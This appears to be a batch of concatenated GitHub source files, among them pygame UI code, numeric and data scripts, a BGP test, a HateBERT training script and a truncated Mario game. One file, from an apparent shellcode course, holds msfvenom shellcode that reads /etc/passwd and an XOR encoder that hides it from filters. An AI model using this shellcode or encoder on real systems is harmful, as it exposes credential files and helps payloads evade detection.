mouse_timer = 0 #only prints mouse button confirmation and duration after it's let go\r\n mouse_pressed = False\r\n\r\n ##### processes #####\r\n\r\n mouse_x = pygame.mouse.get_pos()[0]\r\n mouse_y = pygame.mouse.get_pos()[1] # get mouse position every frame\r\n\r\n if mouse_pressed == True:\r\n mouse_timer += 1 / 60\r\n\r\n main_menu_button.activate(mouse_pressed, mouse_x, mouse_y) # checks whether or not to activate the button\r\n\r\n if main_menu_button.get_activated() is True:\r\n running = False # ending loop and then starting next page makes sure multiple\r\n goto_main = True # game loops aren't running unnecessarily\r\n\r\n\r\n if x <= - 8500:\r\n x = constants.WIDTH + 5 # reset buildings if they go off screen\r\n x -= 15 # move buildings along\r\n\r\n red = random.randint(50, 200)\r\n green = random.randint(50, 200)\r\n blue = random.randint(50, 200) #not colour blind friendly\r\n main_menu_icon.set_colour([red, green, blue])\r\n settings_icon.set_colour([red, green, blue])\r\n account_icon.set_colour([red, green, blue])\r\n leaderboard_icon.set_colour([red, green, blue])\r\n\r\n ##### rendering #####\r\n\r\n screen.fill(constants.DARK_BLUE)\r\n\r\n pygame.draw.circle(screen, constants.NEAR_WHITE, [100, 100], 90, 0) # moon\r\n\r\n screen.blit(background, (x, -200))\r\n\r\n screen.blit(Title, TitleRect)\r\n\r\n screen.blit(Dave_Gandy_title, Dave_Gandy_titleRect)\r\n\r\n screen.blit(Dmitri13_title, Dmitri13_titleRect)\r\n\r\n screen.blit(Alucard_title, Alucard_titleRect)\r\n\r\n screen.blit(FoxSynergy_title, FoxSynergy_titleRect)\r\n\r\n screen.blit(Fupi_title, Fupi_titleRect)\r\n\r\n screen.blit(Nearoo_title, Nearoo_titleRect)\r\n\r\n # (screen, [red, blue, green], [left, top, width, height], filled) = arguments for drawing pygame rectangle\r\n pygame.draw.rect(screen, main_menu_button.colour, [main_menu_button.get_cx() - 24, main_menu_button.get_cy() - 24, 44, 44])\r\n screen.blit(main_menu_button.get_img(), (main_menu_button.get_cx() - 18, main_menu_button.get_cy() - 18))\r\n\r\n screen.blit(Title,TitleRect)\r\n\r\n pygame.draw.rect(screen, main_menu_icon.colour, [main_menu_icon.get_cx() - 24, main_menu_icon.get_cy() -24, 44, 44])\r\n screen.blit(main_menu_icon.get_img(), (main_menu_icon.get_cx() - 18, main_menu_icon.get_cy() - 18))\r\n\r\n pygame.draw.rect(screen, settings_icon.colour, [settings_icon.get_cx() - 24, settings_icon.get_cy() - 24, 44, 44])\r\n screen.blit(settings_icon.get_img(), (settings_icon.get_cx() - 18, settings_icon.get_cy() - 18))\r\n\r\n pygame.draw.rect(screen, account_icon.colour, [account_icon.get_cx() - 24, account_icon.get_cy() - 24, 44, 44])\r\n screen.blit(account_icon.get_img(), (account_icon.get_cx() - 18, account_icon.get_cy() - 18))\r\n\r\n pygame.draw.rect(screen, leaderboard_icon.colour, [leaderboard_icon.get_cx() - 24, leaderboard_icon.get_cy() - 24, 44, 44])\r\n screen.blit(leaderboard_icon.get_img(), (leaderboard_icon.get_cx() - 18, leaderboard_icon.get_cy() - 18))\r\n\r\n pygame.display.flip()\r\n clock.tick(60)\r\n\r\n print(\"Closed credits menu.\") # ends this process and starts the next\r\n\r\n if goto_main == True:\r\n print(\"Opened main menu.\")\r\n main_menu.main(x) # runs main_settings menu","repo_name":"Hamzah2101/pygame_ui","sub_path":"credits.py","file_name":"credits.py","file_ext":"py","file_size_in_byte":7975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38538659917","text":"import numpy as np \r\nimport os\r\ncasicero = 1e-15 \r\ndef GAUSS(A,B):\r\n AB = np.concatenate((A,B),axis=1)\r\n AB0 = np.copy(AB)\r\n tamano = np.shape(AB)\r\n n = tamano[0]\r\n m = tamano[1]\r\n for i in range(0,n-1,1):\r\n columna = abs(AB[i:,i])\r\n dondemax = np.argmax(columna)\r\n if (dondemax !=0):\r\n temporal = np.copy(AB[i,:])\r\n AB[i,:] = AB[dondemax+i,:]\r\n AB[dondemax+i,:] = temporal\r\n AB1 = np.copy(AB)\r\n for i in range(0,n-1,1):\r\n pivote = AB[i,i]\r\n adelante = i + 1\r\n for k in range(adelante,n,1):\r\n factor = AB[k,i]/pivote\r\n AB[k,:] = AB[k,:] - AB[i,:]*factor\r\n AB2 = np.copy(AB)\r\n ltfila = n-1\r\n ultcolumna = m-1\r\n for i in range(ltfila,0-1,-1):\r\n pivote = AB[i,i]\r\n atras = i-1 \r\n for k in range(atras,0-1,-1):\r\n factor = AB[k,i]/pivote\r\n AB[k,:] = AB[k,:] - AB[i,:]*factor\r\n AB[i,:] = AB[i,:]/AB[i,i]\r\n X = np.copy(AB[:,ultcolumna])\r\n X = np.transpose([X])\r\n return X\r\nx=[0,1,2,3,4,5,6]\r\ny=[-0.9,0,2,4.5,8.3,13,13,18]\r\nSr=0\r\nsumy=0\r\nsumx=0\r\nsumx2=0\r\nsumx3=0\r\nsumx4=0\r\nsumxy=0\r\nsumx2y=0\r\nn=len(x)\r\nfor i in range(len(x)):\r\n sumx+=x[i]\r\n sumx2+=x[i]*x[i]\r\n sumx3+=x[i]*x[i]*x[i]\r\n sumx4+=x[i]*x[i]*x[i]*x[i]\r\n sumy+=y[i]\r\n sumxy+=x[i]*y[i]\r\n sumx2y+=x[i]*x[i]*y[i]\r\nA = np.array([[n,sumx,sumx2],\r\n [sumx,sumx2,sumx3],\r\n [sumx2,sumx3,sumx4]])\r\nB = np.array([[sumy],\r\n [sumxy],\r\n [sumx2y]])\r\nprint(GAUSS(A,B))\r\na0=GAUSS(A,B)[0]\r\na1=GAUSS(A,B)[1]\r\na2=GAUSS(A,B)[2]\r\nSr=0\r\nfor i in range(len(x)):\r\n Sr+=(y[i]-a0-a1*x[i]-(a2*x[i]**2))**2\r\nprint(f\"La función resultante es y = {a0} + {a1}x + {a2}x2 + e\")\r\nprint(f\"El coeficiente de correlación es {Sr}\")\r\n\r\n","repo_name":"JuanYepes511/mc-202202-Juan-Yepes","sub_path":"Taller20.py","file_name":"Taller20.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9881578822","text":"from hec.heclib.dss import HecDss,DSSPathname,HecDataManager\nfrom hec.heclib.util import HecTime,HecDouble\nfrom hec.io import TimeSeriesContainer,TimeSeriesCollectionContainer\nfrom hec.dataTable import\tTimeSeriesDataModel\nfrom hec.script import Constants\n\n\ndef getContainers(dss,tag):\n\trval = TimeSeriesCollectionContainer()\n\tpaths = dss.getCondensedCatalog()\n\tfor cr in paths:\n\t\tp = cr.toString()\n\t\tif p.find(tag) >=0:\n\t\t\tpn = DSSPathname(p)\n\t\t\tpn.setDPart(\"\")\n\t\t\t#p.setFPart()\n\t\t\ttsc = dss.get(pn.toString())\n\t\t\t\n\t\t\trval.add(tsc)\n\treturn rval\n\ndef parseValue(val):\n\trval =0.0\n\tif isinstance(val,HecDouble):\n\t\trval = val.value()\n\telif val.toString().strip() == \"\":\n\t\trval = Constants.UNDEFINED\n\telse:\n\t\trval = float(val)\n\treturn rval\n\ndef getColumnArray(m,columnIndex):\n\trval = []\n\tnumberValues = m.getRowCount()\n\tfor i in range(0, numberValues):\n\t\tval = m.getValueAt(i,columnIndex)\n\t\trval.append(parseValue(val))\n\treturn rval\n\ndef getRowArray(m,rowIndex,offset):\n\trval = []\n\tfor i in range(offset, m.getColumnCount()-1):\n\t\trval.append(parseValue(m.getValueAt(rowIndex,i)))\n\treturn rval\n\ndef packageAsProfile(tscC, pathName):\n\n#\trval.times = tscC.getTimes()\n\tm = TimeSeriesDataModel()\n\tm.setData([tscC],False,0)\n\n\tcolumns = m.getDataColumns()\n\tprint(\"columns.size()\"+str(columns.size()))\n\tprint(\"m.getRowCount()\"+str(m.getRowCount()))\n\t\n\tnumberDepths = columns.size()\n\tnumberValues = m.getRowCount()\n\tprint (\"len(numberValues): \"+str(numberValues))\n\t\n\tprofileDepths=[]\n\tfor i in range(1,numberDepths):\n\t\tprofileDepths.append(i*1.0)\n\tprint (\"len(profileDepths): \"+str(len(profileDepths)))\n\n\toffset =3\n\tprofileValues = []\n\tfor i in range(offset, numberValues):\n\t\tr = getRowArray(m,i,offset)\n\t\tprofileValues.append(r)\n\tprint( profileValues\t)\n\t\n\ttsc1 = tscC.get(0)\n\trval = TimeSeriesContainer()\n\trval.setName(pathName)\n\trval.setStartTime(tsc1.startHecTime)\n\trval.setProfile(profileDepths, profileValues)\n\trval.setProfileDepthsUnits(tsc1.units)\n\t#rval.units = tsc1.units\n\trval.setProfileValuesUnits(tsc1.units)\n\trval.setType(\"Inst-Val\")\n\trval.profileLabel=\"profile - label -here\"\n\n\treturn rval\n\n\n\ndss_filename = R\"C:\\project\\DSSVue-Example-Scripts\\data\\forecast_data.dss\"\n\ndss = HecDss.open(dss_filename)\ntscC = getContainers(dss,'T:2021.09.01-0600')\npathName=\"//GAPT/Version-Flow-Out//6Hour/T:2021.09.01-0600|Fcst-MRBWM-GRFT/\"\nprofile = packageAsProfile(tscC,pathName)\ndss.put(profile)\n\ntscC = getContainers(dss,'T:2021.10.01-0600')\npathName=\"//GAPT/Version-Flow-Out//6Hour/T:2021.10.01-0600|Fcst-MRBWM-GRFT/\"\nprofile = packageAsProfile(tscC,pathName)\ndss.put(profile)\n\ndss.close()\n\n\n","repo_name":"HydrologicEngineeringCenter/DSSVue-Example-Scripts","sub_path":"src/forecast-versions/forecast-data-profile-struct.py","file_name":"forecast-data-profile-struct.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"40"} +{"seq_id":"25405947953","text":"\"\"\"\nExercise2 : Solution\n\n\"\"\"\nimport cv2\nimport numpy as np\nimport matplotlib\n\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\n\nplt.style.use('dark_background') # Dark background for a prettier plot\n\n\ndef display_images():\n \"\"\"\n This function obtains results from generators and plot image and image intensity\n \"\"\"\n vc = cv2.VideoCapture(0) # Open webcam using opencv 0 = First available camera\n figure, ax = plt.subplots(1, 2, figsize=(10, 5))\n\n count = 0\n intensity = []\n g = stream_frames(vc)\n\n for i in g:\n # i[0] : rgb image\n # i[1] : intensity of image\n intensity.append(i[1])\n plot_image_and_brightness(axis=ax, image=i[0], imageintensity=intensity, framecount=count)\n count += 1\n if cv2.waitKey(1) & 0xFF == ord('q'):\n # Clean up if q is pressed\n plt.close('all')\n g.close()\n break\n\ndef stream_frames(video_capture):\n \"\"\"\n This generator function acquires images, convert to rgb, get mean intensity\n and yield necessary results\n :param video_capture: the video capture object from opencv\n :yield RGB_image\n Image Intensity\n \"\"\"\n try:\n while True:\n _, frame = video_capture.read() # Read image from webcam\n rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB) # Convert to rgb\n intensity = np.mean(rgb) # Get mean intensity\n yield rgb, intensity\n except GeneratorExit:\n print('Closing Cameras')\n video_capture.release()\n\n\ndef plot_image_and_brightness(axis, image, imageintensity, framecount):\n \"\"\"\n This function plots image and intensity of image through time\n :param axis: figure axis for plotting\n image: rgb image\n imageintensity: intensity of image\n framecount: present frame number\n \"\"\"\n\n # Plot RGB image\n axis[0].imshow(image)\n axis[0].axis('off')\n axis[0].set_title(f'Frame Number {framecount}')\n\n # Plot intensity\n axis[1].plot(imageintensity, '.-')\n axis[1].set_ylabel('Average Intensity')\n\n # Stuff to show and stream plot\n plt.show(block=False)\n plt.pause(0.001)\n\n\ndisplay_images()\n","repo_name":"seethakris/ASPPsamples","sub_path":"Exercise2_webcamstream_solution.py","file_name":"Exercise2_webcamstream_solution.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41183319886","text":"main_list = []\nwith open(\"input.txt\",\"r\") as input:\n inputlst = [[item.split(\"|\")[0].strip().split(\" \"),item.split(\"|\")[1].strip().split(\" \")] for item in input.read().split(\"\\n\")]\n\nprint(inputlst[0])\n\nuniquelinecounts = [2, 4, 3, 7]\n\nthing_count = 0\n\nfor item in inputlst:\n for thing in item[1]:\n if len(thing) in uniquelinecounts:\n thing_count +=1\n print(thing)\n\nprint(f\"There are {thing_count} instances of number with a unique number of line segments\")\n\n# 6666\n# 5 4\n# 5 4\n# 3333\n# 2 1\n# 2 1\n# 0000\n\n# 1,2,3,4,5\n\nletters7 = [\"012456\",\"14\",\"02346\",\"01346\",\"1345\",\"01356\",\"012356\",\"146\",\"0123456\",\"013456\"]\n\ngrand_total = 0\n\nsetindex = {\"a\":0,\"b\":1,\"c\":2,\"d\":3,\"e\":4,\"f\":5,\"g\":6}\nsetindexinverse = [\"a\",\"b\",\"c\",\"d\",\"e\",\"f\",\"g\"]\nfor item in inputlst:\n final_letters = [\"\",\"\",\"\",\"\", \"\",\"\",\"\"]\n number_codes = [\"\",\"\",\"\",\"\", \"\",\"\",\"\",\"\",\"\",\"\"]\n uncatagorized = []\n\n\n # Sorting the letters \n for set in enumerate(item[0]):\n if len(set[1]) in uniquelinecounts:\n if len(set[1]) == 2: number_codes[1] = set[1]\n if len(set[1]) == 3: number_codes[7] = set[1]\n if len(set[1]) == 4: number_codes[4] = set[1]\n if len(set[1]) == 7: number_codes[8] = set[1]\n\n else:\n uncatagorized.append(set[1])\n letters = [0,0,0,0, 0,0,0]\n\n # Getting the top part of the code (6)\n difference = [letter for letter in number_codes[7] if letter not in number_codes[1]]\n\n final_letters[6] = difference[0]\n\n # Generating a lsit of the counts + letters for the non-sorted numbers\n unsortedlettercounts = [[0,\"\"],[0,\"\"],[0,\"\"],[0,\"\"],[0,\"\"],[0,\"\"],[0,\"\"]]\n for thing in uncatagorized:\n for letter in thing:\n unsortedlettercounts[setindex[letter]][0] += 1\n unsortedlettercounts[setindex[letter]][1] = letter\n\n # Getting letters based on the previous count\n for char in unsortedlettercounts:\n if char[0] == 3: final_letters[2] = char[1]\n if char[0] == 6 and char[1] != final_letters[6]: final_letters[0] = char[1]\n if char[0] == 5 and char[1] in number_codes[1]: final_letters[1] = char[1]\n if char[0] == 4 and char[1] in number_codes[1]: final_letters[4] = char[1]\n if char[0] == 5 and char[1] not in number_codes[1]: final_letters[3] = char[1]\n if char[0] == 4 and char[1] not in number_codes[1]: final_letters[5] = char[1]\n\n\n # Construct the numbers after the | in the original problem\n current_num = \"\"\n for num in item[1]:\n letterstr = \"\"\n for letter in num:\n letterstr += str(final_letters.index(letter))\n letterstr = \"\".join(str(sorted(letterstr)).translate(str.maketrans({\"[\":\"\",\"]\":\"\",\",\":\"\",\" \":\"\",\"'\":\"\",})))\n \n \n\n if letterstr in letters7:\n print(\"sucess\")\n current_num = current_num+str(letters7.index(letterstr))\n else:\n print(\"error\")\n grand_total += int(current_num)\n print(\"iter---------------------------------------\")\n\nprint(f\"The total of all numbers displayed on the 7 segments dislays is {grand_total}\")","repo_name":"MaximumMaxxx/AOC","sub_path":"day-8/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18093987421","text":"\ndef isIn(test_value, string):\n string = string.lower()\n string = ''.join(sorted(string))\n if len(string) == 0:\n return False\n elif len(string) > 0:\n if len(string) == 1:\n if string == test_value:\n return True\n else:\n return False\n \n elif len(string) > 1:\n first = string[0]\n last = string[-1]\n middlevalue = len(string)//2\n if string[middlevalue] == test_value:\n return True\n else:\n if string[middlevalue] < test_value:\n return isIn(test_value, string[middlevalue:])\n else:\n return isIn(test_value, string[:middlevalue])\n \n \nprint(isIn('y', 'Python'))","repo_name":"mmbogajemimah/Algorithms","sub_path":"recur_strings3.py","file_name":"recur_strings3.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10767901384","text":"# Load model directly\nfrom transformers import AutoTokenizer, AutoModelForMaskedLM,BertForSequenceClassification\nfrom transformers import TrainingArguments,DataCollatorWithPadding,Trainer\nimport os\nimport evaluate\nimport numpy as np\nimport pandas as pd\nfrom datasets import Dataset\n# os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"2\"\nnum_class = 2\ndevice = \"cuda\"\nid2label = {0: \"NEGATIVE\", 1: \"POSITIVE\"}\nlabel2id = {\"NEGATIVE\": 0, \"POSITIVE\": 1}\ncache_dir = '.'\ntokenizer = AutoTokenizer.from_pretrained(\"GroNLP/hateBERT\",cache_dir=cache_dir)\nmodel = BertForSequenceClassification.from_pretrained(\"GroNLP/hateBERT\",cache_dir=cache_dir,num_labels=2,id2label=id2label, label2id=label2id,)\n\n#load data\ntrain_path='./DiaSafety_dataset/train.json'\ntest_path = './DiaSafety_dataset/test.json'\ntrain_df = pd.read_json(train_path)\ntest_df = pd.read_json(test_path)\ntrain_dataset = Dataset.from_pandas(train_df)\ntest_dataset = Dataset.from_pandas(test_df)\nprint(train_dataset)\nprint(test_dataset)\n\n#preprocess data\ndef preprocess_function(examples):\n max_len =512\n context_list = [\"context:\"+context for context in examples[\"context\"]]\n response_list = [\"response:\"+response for response in examples[\"response\"]]\n label_list = [1 if label=='Safe' else 0 for label in examples[\"label\"]]\n toknized_data = tokenizer(context_list,response_list,\n padding='max_length', # Pad to max_length\n truncation=True, # Truncate to max_length\n max_length=max_len, \n return_tensors='pt')\n toknized_data['label'] = label_list\n return toknized_data\ntokenized_train_dataset = train_dataset.map(preprocess_function,batched=True)\ntokenized_test_dataset = test_dataset.map(preprocess_function,batched=True)\n\n\ndef compute_metrics(eval_pred):\n accuracy = evaluate.load(\"accuracy\")\n predictions, labels = eval_pred\n predictions = np.argmax(predictions, axis=1)\n return accuracy.compute(predictions=predictions, references=labels)\n\ntraining_args = TrainingArguments(\n output_dir=\"./bert_on_DiaSafety\",\n learning_rate=2e-5,\n per_device_train_batch_size=16,\n per_device_eval_batch_size=16,\n num_train_epochs=20,\n weight_decay=0.01,\n evaluation_strategy=\"epoch\",\n save_strategy=\"epoch\",\n load_best_model_at_end=True,\n)\n\ndata_collator = DataCollatorWithPadding(tokenizer=tokenizer)\ntrainer = Trainer(\n model=model,\n args=training_args,\n train_dataset=tokenized_train_dataset,\n eval_dataset=tokenized_test_dataset,\n tokenizer=tokenizer,\n data_collator=data_collator,\n# compute_metrics=custom_metrics,\n compute_metrics=compute_metrics,\n)\ntrainer.train()\ntrainer.save_model()\ntrainer.save_state()\n","repo_name":"jackking2333/Languange_model_scripts","sub_path":"train_bert.py","file_name":"train_bert.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23732326858","text":"import os\nimport sys\nimport json\nimport pytest\n\npytestmark = [pytest.mark.bgpd]\n\nCWD = os.path.dirname(os.path.realpath(__file__))\nsys.path.append(os.path.join(CWD, \"../\"))\n\n# pylint: disable=C0413\nfrom lib.topogen import Topogen, TopoRouter, get_topogen\nfrom lib.common_config import step\n\npytestmark = [pytest.mark.bgpd]\n\n\ndef build_topo(tgen):\n for routern in range(1, 5):\n tgen.add_router(\"r{}\".format(routern))\n\n switch = tgen.add_switch(\"s1\")\n switch.add_link(tgen.gears[\"r1\"])\n switch.add_link(tgen.gears[\"r2\"])\n switch.add_link(tgen.gears[\"r3\"])\n switch.add_link(tgen.gears[\"r4\"])\n\n\ndef setup_module(mod):\n tgen = Topogen(build_topo, mod.__name__)\n tgen.start_topology()\n\n router_list = tgen.routers()\n\n for i, (rname, router) in enumerate(router_list.items(), 1):\n router.load_config(\n TopoRouter.RD_ZEBRA, os.path.join(CWD, \"{}/zebra.conf\".format(rname))\n )\n router.load_config(\n TopoRouter.RD_BGP, os.path.join(CWD, \"{}/bgpd.conf\".format(rname))\n )\n\n tgen.start_router()\n\n\ndef teardown_module(mod):\n tgen = get_topogen()\n tgen.stop_topology()\n\n\ndef test_bgp_default_ipv4_ipv6_unicast():\n tgen = get_topogen()\n\n if tgen.routers_have_failure():\n pytest.skip(tgen.errors)\n\n step(\"Check if neighbor 192.168.255.254 is enabled for ipv4 address-family only\")\n\n def _bgp_neighbor_ipv4_af_only():\n tgen.gears[\"r1\"].vtysh_cmd(\n \"conf t\\nrouter bgp\\nneighbor 192.168.255.254 remote-as external\"\n )\n\n output = json.loads(tgen.gears[\"r1\"].vtysh_cmd(\"show bgp summary json\"))\n\n if len(output.keys()) == 1 and \"ipv4Unicast\" in output:\n return True\n return False\n\n assert _bgp_neighbor_ipv4_af_only() == True\n\n step(\"Check if neighbor 192.168.255.254 is enabled for ipv6 address-family only\")\n\n def _bgp_neighbor_ipv6_af_only():\n tgen.gears[\"r2\"].vtysh_cmd(\n \"conf t\\nrouter bgp\\nneighbor 192.168.255.254 remote-as external\"\n )\n\n output = json.loads(tgen.gears[\"r2\"].vtysh_cmd(\"show bgp summary json\"))\n\n if len(output.keys()) == 1 and \"ipv6Unicast\" in output:\n return True\n return False\n\n assert _bgp_neighbor_ipv6_af_only() == True\n\n step(\"Check if neighbor 192.168.255.254 is enabled for evpn address-family only\")\n\n def _bgp_neighbor_evpn_af_only():\n tgen.gears[\"r3\"].vtysh_cmd(\n \"conf t\\nrouter bgp\\nneighbor 192.168.255.254 remote-as external\"\n )\n\n output = json.loads(tgen.gears[\"r3\"].vtysh_cmd(\"show bgp summary json\"))\n\n if len(output.keys()) == 1 and \"l2VpnEvpn\" in output:\n return True\n return False\n\n assert _bgp_neighbor_evpn_af_only() == True\n\n step(\n \"Check if neighbor 192.168.255.254 is enabled for ipv4/ipv6 unicast and evpn address-families\"\n )\n\n def _bgp_neighbor_ipv4_ipv6_and_evpn_af():\n tgen.gears[\"r4\"].vtysh_cmd(\n \"conf t\\nrouter bgp\\nneighbor 192.168.255.254 remote-as external\"\n )\n\n output = json.loads(tgen.gears[\"r4\"].vtysh_cmd(\"show bgp summary json\"))\n\n if (\n len(output.keys()) == 3\n and \"ipv4Unicast\" in output\n and \"ipv6Unicast\" in output\n and \"l2VpnEvpn\" in output\n ):\n return True\n return False\n\n assert _bgp_neighbor_ipv4_ipv6_and_evpn_af() == True\n\n\nif __name__ == \"__main__\":\n args = [\"-s\"] + sys.argv[1:]\n sys.exit(pytest.main(args))\n","repo_name":"FRRouting/frr","sub_path":"tests/topotests/bgp_default_afi_safi/test_bgp-default-afi-safi.py","file_name":"test_bgp-default-afi-safi.py","file_ext":"py","file_size_in_byte":3510,"program_lang":"python","lang":"en","doc_type":"code","stars":2787,"dataset":"github-code","pt":"40"} +{"seq_id":"28632105310","text":"#!/bin/python3\nimport random\nimport binascii\n\n\n# msfvenom -p linux/x86/read_file -f c PATH=/etc/passwd -b '\\x00'\npayload = b\"\\xbe\\xd4\\xa1\\x45\\x1e\\xda\\xc1\\xd9\\x74\\x24\\xf4\\x5d\\x29\\xc9\\xb1\\x13\\x31\\x75\\x13\\x83\\xed\\xfc\\x03\\x75\\xdb\\x43\\xb0\\xf5\\xd5\\x3b\\x3e\\x0a\\x19\\x3c\\x1a\\x3b\\xd0\\xf1\\x1c\\xb2\\x21\\xb1\\x1e\\xc5\\xa5\\xc2\\xa9\\x22\\x2c\\x3b\\x13\\xac\\x3e\\xbc\\x64\\x60\\xbe\\x35\\xa6\\xc2\\xba\\x45\\x27\\x33\\x79\\x44\\x27\\x33\\x7d\\x8a\\xa7\\x8b\\x7c\\x14\\xa8\\xeb\\xc5\\x14\\xa8\\xeb\\x39\\xd8\\x28\\x03\\xfc\\x1d\\xd7\\x2b\\xd1\\x84\\x5c\\xb7\\x02\\x37\\xfc\\x44\\x2f\\xc0\\x9a\\xaa\"\n\nbad_bytes = [ 0xff, 0x00 ]\n\noutput = \"\"\nfor b in payload:\n # new random byte to xor with\n while True:\n rand_byte = random.randbytes(1)\n\n # xor real shellcode byte with randomly generated byte\n new_shellcode_byte = b ^ int.from_bytes(rand_byte, 'little')\n\n # check if new shellcode will contatin 0xff or 0x00 \n if not rand_byte in bad_bytes and not new_shellcode_byte in bad_bytes:\n break\n print(\"FOUND 0xFF or 0x00 in rand_byte or new_shellcode_byte, generating new random byte!!\")\n \n # print(f\"{hex(b)} ^ {hex(int.from_bytes(rand_byte, 'little'))} = {hex(new_shellcode_byte)}\")\n output += '\\\\x' + binascii.hexlify(rand_byte).decode('utf-8')\n output += '\\\\x' + hex(new_shellcode_byte)[2:].zfill(2)\n\n# append our end stub to the end of our payload. This signifies the exit condition.\noutput += '\\\\xff\\\\xff'\n\n\nprint(f\"\\n{output}\\n\")\nprint(\", 0x\".join(output.split('\\\\x'))[2:])\nprint(\"\\nlength: \" + str(len(output.split('\\\\x')) - 1), \" - hex: \", str(hex(len(output.split('\\\\x')) - 1)))\n","repo_name":"alecmaly/slae","sub_path":"slae86/project4/custom_encode.py","file_name":"custom_encode.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29480117197","text":"melon_cost = 1.00\n\ndef customer_payment(path):\n \"\"\"Opens file, tokenizes llines, prints statement if expected amount not equal to paid amount \"\"\"\n customer_orders = open(path) # Open file at path\n # Iterate over lines in file\n for line in customer_orders:\n # Strip whitespace from end of line\n line = line.rstrip()\n # Split line along '|' to get list of strings\n words = line.split('|')\n # Unpack list of strings and name variables\n cust_num, cust_name, cust_melons, cust_paid = words\n cust_melons = int(cust_melons) # Change variable type from 'str' to 'int'\n cust_paid = float(cust_paid) # Change variable type from 'str' to 'float'\n\n # Calculate expected cost of customer order\n cust_expect = (cust_melons*melon_cost)\n \n # Compare expected cost to what customer paid, if overpaid print statement that they overpaid, if underpaid; print statement that they underpaid\n if cust_expect < cust_paid:\n print(f\"{cust_name} OVER paid for their melons\")\n if cust_expect > cust_paid:\n print(f\"{cust_name} UNDER paid for their melons\")\n # Close the file\n customer_orders.close()\n #return\n\n# Call the function\ncustomer_payment(\"/home/hackbright/src/homework/accounting/customer-orders.txt\")\n\n#*** Hackbright starting code below***\n# customer1_name = \"Joe\"\n# customer1_melons = 5\n# customer1_paid = 5.00\n\n# customer2_name = \"Frank\"\n# customer2_melons = 6\n# customer2_paid = 6.00\n\n# customer3_name = \"Sally\"\n# customer3_melons = 3\n# customer3_paid = 3.00\n\n# customer4_name = \"Sean\"\n# customer4_melons = 9\n# customer4_paid = 9.50\n\n# customer5_name = \"David\"\n# customer5_melons = 4\n# customer5_paid = 4.00\n\n# customer6_name = \"Ashley\"\n# customer6_melons = 3\n# customer6_paid = 2.00\n\n# customer1_expected = customer1_melons * melon_cost\n# if customer1_expected != customer1_paid:\n# print(f\"{customer1_name} paid ${customer1_paid:.2f},\",\n# f\"expected ${customer1_expected:.2f}\"\n# )\n\n# customer2_expected = customer2_melons * melon_cost\n# if customer2_expected != customer2_paid:\n# print(f\"{customer2_name} paid ${customer2_paid:.2f},\",\n# f\"expected ${customer2_expected:.2f}\"\n# )\n\n# customer3_expected = customer3_melons * melon_cost\n# if customer3_expected != customer3_paid:\n# print(f\"{customer3_name} paid ${customer3_paid:.2f},\",\n# f\"expected ${customer3_expected:.2f}\"\n# )\n\n# customer4_expected = customer4_melons * melon_cost\n# if customer4_expected != customer4_paid:\n# print(f\"{customer4_name} paid ${customer4_paid:.2f},\",\n# f\"expected ${customer4_expected:.2f}\"\n# )\n\n# customer5_expected = customer5_melons * melon_cost\n# if customer5_expected != customer5_paid:\n# print(f\"{customer5_name} paid ${customer5_paid:.2f},\",\n# f\"expected ${customer5_expected:.2f}\"\n# )\n\n# customer6_expected = customer6_melons * melon_cost\n# if customer6_expected != customer6_paid:\n# print(f\"{customer6_name} paid ${customer6_paid:.2f},\",\n# f\"expected ${customer6_expected:.2f}\"\n# )\n","repo_name":"mauratee/homework-accounting","sub_path":"accounting.py","file_name":"accounting.py","file_ext":"py","file_size_in_byte":3137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26894881940","text":"import sys\nimport pygame.sprite\nimport pyganim\nimport Colors\nimport Levels\nimport Menu\nimport Monsters\nimport ScreenSettings\nimport main\n\nSPEED_MOVE = 5\nJUMP_POWER = 10\nGRAVITY = 0.35\n# WIDTH = 32\nWIDTH = 25\nHEIGHT = 32\n\nMOVE_EXTRA_SPEED = 2.5 # Укорение\nJUMP_EXTRA_POWER = 3 # доп сила прыжка\nANIMATION_SUPER_SPEED_DELAY = 1 # скорость смены кадров при ускорении\n\n# Переменные для анимации героя\nCHARACTER_DELAY = 1\nCHARACTER_RIGHT = ['images/Mario/1/r1.png',\n 'images/Mario/1/r2.png',\n 'images/Mario/1/r3.png',\n 'images/Mario/1/r4.png',\n 'images/Mario/1/r5.png']\nCHARACTER_LEFT = ['images/Mario/1/l1.png',\n 'images/Mario/1/l2.png',\n 'images/Mario/1/l3.png',\n 'images/Mario/1/l4.png',\n 'images/Mario/1/l5.png']\nCHARACTER_JUMP_LEFT = [('images/Mario/1/jl.png', 1)]\nCHARACTER_JUMP_RIGHT = [('images/Mario/1/jr.png', 1)]\nCHARACTER_JUMP = [('images/Mario/1/j.png', 1)]\nCHARACTER_STOP = [('images/Mario/1/0.png', 1)]\n\n\nclass Mario(pygame.sprite.Sprite):\n def __init__(self, x, y):\n pygame.sprite.Sprite.__init__(self) # Инициализатор встроенных классов Sprite\n self.startX = 40\n self.startY = 40\n self.health = 9\n self.xvel = 0 # скорость перемещения по горизонтали\n self.yvel = 0 # скорость перемещения по вертикали\n self.GroundPosition = False # на земеле или нет\n self.image = pygame.Surface((WIDTH, HEIGHT))\n self.image.fill(Colors.PURPLE)\n self.rect = pygame.Rect(x, y, WIDTH, HEIGHT)\n self.jump = 